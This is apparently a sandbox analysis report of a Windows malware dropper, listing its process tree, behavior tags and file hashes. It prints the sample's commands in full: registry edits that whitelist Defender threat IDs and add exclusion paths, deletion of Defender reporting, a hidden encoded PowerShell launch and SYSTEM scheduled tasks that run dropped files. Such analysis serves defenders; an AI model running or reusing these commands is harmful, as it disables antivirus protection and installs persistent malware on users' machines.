C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4932 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
- Suspicious use of WriteProcessMemory
PID:3532 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:2172
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:4232
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:4872
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:4572
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:752
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:5004
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:3964
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:4524
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵PID:4848
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵PID:4152
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:3968
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:3780
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:1144
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:664
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:3336
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:3344
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:4788
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:4876
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:3044
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:4360
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:5064
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:1724
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:1124
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:3328
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\GCRfJHsLrQUU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\GCRfJHsLrQUU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RsrRlNSOmQpSC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RsrRlNSOmQpSC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\dvcQCBtrcHUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\dvcQCBtrcHUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\nVxaeCGGUgNesTsLMyR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\nVxaeCGGUgNesTsLMyR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\pjFvAzrMU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\pjFvAzrMU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\dOGsUmsmiFFhLNVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\dOGsUmsmiFFhLNVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\kuqfyaaoRoeomIaXg\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\kuqfyaaoRoeomIaXg\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\npCbTmFCzSYUSdqP\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\npCbTmFCzSYUSdqP\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2364 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GCRfJHsLrQUU2" /t REG_DWORD /d 0 /reg:323⤵PID:3240
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GCRfJHsLrQUU2" /t REG_DWORD /d 0 /reg:324⤵PID:4456
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GCRfJHsLrQUU2" /t REG_DWORD /d 0 /reg:643⤵PID:2076
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RsrRlNSOmQpSC" /t REG_DWORD /d 0 /reg:323⤵PID:1656
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RsrRlNSOmQpSC" /t REG_DWORD /d 0 /reg:643⤵PID:2808
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dvcQCBtrcHUn" /t REG_DWORD /d 0 /reg:323⤵PID:1536
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dvcQCBtrcHUn" /t REG_DWORD /d 0 /reg:643⤵PID:812
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nVxaeCGGUgNesTsLMyR" /t REG_DWORD /d 0 /reg:323⤵PID:2220
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nVxaeCGGUgNesTsLMyR" /t REG_DWORD /d 0 /reg:643⤵PID:3384
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\pjFvAzrMU" /t REG_DWORD /d 0 /reg:323⤵PID:4208
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\pjFvAzrMU" /t REG_DWORD /d 0 /reg:643⤵PID:1152
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\dOGsUmsmiFFhLNVB /t REG_DWORD /d 0 /reg:323⤵PID:32
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\dOGsUmsmiFFhLNVB /t REG_DWORD /d 0 /reg:643⤵PID:852
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\kuqfyaaoRoeomIaXg /t REG_DWORD /d 0 /reg:323⤵PID:3976
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\kuqfyaaoRoeomIaXg /t REG_DWORD /d 0 /reg:643⤵PID:3628
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\npCbTmFCzSYUSdqP /t REG_DWORD /d 0 /reg:323⤵PID:4832
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\npCbTmFCzSYUSdqP /t REG_DWORD /d 0 /reg:643⤵PID:2436
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gvmVTdErT" /SC once /ST 13:09:51 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
PID:3372
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gvmVTdErT"2⤵PID:3820
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gvmVTdErT"2⤵PID:4708
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "EYwoUjzpSpPCMYcxX" /SC once /ST 13:13:20 /RU "SYSTEM" /TR "\"C:\Windows\Temp\npCbTmFCzSYUSdqP\IauGDgmmJIdDdEy\hFYvDGo.exe\" nO /site_id 385104 /S" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:4324
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "EYwoUjzpSpPCMYcxX"2⤵PID:3208
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1128 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:3832
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:4724
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:3020
-
C:\Windows\Temp\npCbTmFCzSYUSdqP\IauGDgmmJIdDdEy\hFYvDGo.exeC:\Windows\Temp\npCbTmFCzSYUSdqP\IauGDgmmJIdDdEy\hFYvDGo.exe nO /site_id 385104 /S1⤵
- Executes dropped EXE
- Checks computer location settings
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:3564 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bAekpXbeORPoFqoXcn"2⤵PID:1464
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:322⤵PID:2692
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵PID:3080
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:642⤵PID:4780
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵PID:3532
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\pjFvAzrMU\fADQJc.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "hJUayhHcLKanQXB" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:3184
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "hJUayhHcLKanQXB2" /F /xml "C:\Program Files (x86)\pjFvAzrMU\cmISWGz.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:1060
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "hJUayhHcLKanQXB"2⤵PID:3672
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "hJUayhHcLKanQXB"2⤵PID:3796
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "jzDKtHfOcumzfg" /F /xml "C:\Program Files (x86)\GCRfJHsLrQUU2\HasSRmJ.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:1644
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "GaLgnGHrfjZKC2" /F /xml "C:\ProgramData\dOGsUmsmiFFhLNVB\uPthxOz.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:4184
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "qisTdcZctOvsmkUWA2" /F /xml "C:\Program Files (x86)\nVxaeCGGUgNesTsLMyR\yKRcKKY.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:1724
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "rGnrBBLhNdhAilewNRv2" /F /xml "C:\Program Files (x86)\RsrRlNSOmQpSC\sKktvsU.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:3900
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "okLkyXunDVQVEvYWW" /SC once /ST 19:28:42 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\npCbTmFCzSYUSdqP\zbqdkeYf\YrVZTDj.dll\",#1 /site_id 385104" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1800
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "okLkyXunDVQVEvYWW"2⤵PID:2240
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:322⤵PID:3940
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵PID:3976
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:642⤵PID:1848
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:643⤵PID:1092
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "EYwoUjzpSpPCMYcxX"2⤵PID:1784
-
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\npCbTmFCzSYUSdqP\zbqdkeYf\YrVZTDj.dll",#1 /site_id 3851041⤵PID:4912
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\npCbTmFCzSYUSdqP\zbqdkeYf\YrVZTDj.dll",#1 /site_id 3851042⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:3060 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "okLkyXunDVQVEvYWW"3⤵PID:3440
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5db253f57c05688248f8db5b671cbe8c9
SHA16c4c952af3d2a9b9eb699ac50cded6e25c7829c9
SHA256e409499871c17e6c6391c8b023e4d8b52e8cb79194feefea4d9dce29436a229d
SHA51241fad02fb559cde0b8588dff24cbbca87d5e16f52379e584b913e98a8e005d777965d5db11c3d0bec8777d9c60462c18bc10b3184afd1cabda0ef7d063f67d1b
-
Filesize
2KB
MD54868be233607d8929a6dc94db5542800
SHA1e826fc85d86ae055b0950c68924b27a403ff8121
SHA25634f38944daf84184781cbfb6d4dab291db8f63c841daace634611b38303453c9
SHA51206a042d4e4495785db4885eb6e079e7be5008b97be2484fb44c95fe0c6c2c929d9990015149e7b497d43ed854c34077152eac0e42ceccbc830d1e6a0f904b25c
-
Filesize
2KB
MD5ebe41ed0c055a15bbc4b4cf2960c71a7
SHA16cc01b9817052462725d280cb5be75556ef1b23c
SHA256366770d7d0db5caf6164660a2a69d84b2d9f7e1d999b5b80cb9ab08108b6e6e6
SHA512b69031be9950883d1d04c2c4fc7545b4d553206daf8b20773d1dc0cb5c5554bba05dcef054a75375a4b854849414402afc1b44b4b823e9d612958d27d1b324ac
-
Filesize
2KB
MD54271e52e2ba51b3fe90c7e4f3cc77429
SHA1de6c8123490c8921e0cae1ec2971efeac7b49908
SHA256df1be7ff59e3f5d0f6b85c97f986746916aab0cc771f4d227ec8e416797e0c76
SHA512d62e6d6bd73a565895867ab222f96d19ee249843965ff365b3361928808a99da412e22546d157d61da0c5ef8042b551f8ab939e0fa32da300afbb1a8cda80a48
-
Filesize
2KB
MD509a2df77bc48c459b6baff404ae0aef6
SHA11917ef572b6c20a9bd57c53775f723305a816212
SHA256335531dfc621d82236fa11fa83abf6d562a23639c25a929b7133103e011dc3fd
SHA512b36e830dbeb1d01a58b2bed615c311adf593a94a26713fee1685ca6dc77944e4101c49fe80c14d64b431e0482d2a65015b2de703c6e5c4e96315a457429ac688
-
Filesize
2KB
MD56cf293cb4d80be23433eecf74ddb5503
SHA124fe4752df102c2ef492954d6b046cb5512ad408
SHA256b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA5120f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00
-
Filesize
64B
MD53ca1082427d7b2cd417d7c0b7fd95e4e
SHA1b0482ff5b58ffff4f5242d77330b064190f269d3
SHA25631f15dc6986680b158468bf0b4a1c00982b07b2889f360befd8a466113940d8f
SHA512bbcfd8ea1e815524fda500b187483539be4a8865939f24c6e713f0a3bd90b69b4367c36aa2b09886b2006b685f81f0a77eec23ab58b7e2fb75304b412deb6ca3
-
Filesize
6.2MB
MD5b3aeced21fb1baaa00754bd687a39368
SHA1d6650f40b408c323b322e44d55b6edd2f5a54079
SHA256013e64443a253d93fd00e0278fc29693a398a8a65f8369af4a7f5e16555c48a4
SHA512b53d8ad355c6b8df41b9af09ada165e4853ab5dd41a7616d88cd89a9bd72ea8b063385e13277b6f8174d81adc2133288f33cef0c9e955a7bd5cb0a380ad2a8ca
-
Filesize
6.2MB
